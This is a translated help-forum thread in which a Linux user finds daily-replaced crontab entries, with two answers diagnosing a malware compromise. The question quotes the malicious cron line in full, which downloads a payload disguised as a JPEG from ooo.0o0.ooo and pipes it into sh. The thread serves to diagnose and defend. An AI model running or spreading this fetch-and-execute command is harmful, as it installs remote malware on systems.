Entradas do Crontab no Servidor Linux sendo excluídas automaticamente todos os dias

0

Crontab Entries no meu Linux está sendo deletado todos os dias. Eu adicionei as entradas e no dia seguinte quando eu verificar tudo que eu consegui encontrar é:

*/60 * * * * curl https://ooo.0o0.ooo/2017/01/21/58837a6d11262.jpg -k|dd skip=3458 bs=1|sh

Mesmo tempo, as entradas do crontab no usuário root ainda estão lá. Alguém pode ajudar, como a minha equipe de TI em si não está ciente. Alguém pode ajudar?

    
por user216335 16.02.2017 / 07:10

2 respostas

5

Uma entrada crontab que faz o download de um script de shell (disfarçado em um JPEG não menos) e o executa sugere strongmente que seu sistema foi comprometido. Você deve desligar o computador afetado e perguntar a sua equipe de TI o que fazer com ele.

(O comprometimento explicaria suas entradas crontab desaparecidas - presumivelmente, qualquer malware que você inadvertidamente hospede reescreve o crontab.)

    
por 16.02.2017 / 10:05
2

Seu sistema foi infectado com um vírus 'lady linux', você precisa otimizar a segurança. verifique a pasta '/ tmp' para arquivos misteriosos, e bloqueie as portas TCP / UDP sem uso, e bloqueie o destino de saída ooo.0o0.ooo, para seus servidores. No entanto, deve ser difícil encontrar a raiz do problema.

    
por 27.02.2017 / 23:52

Tags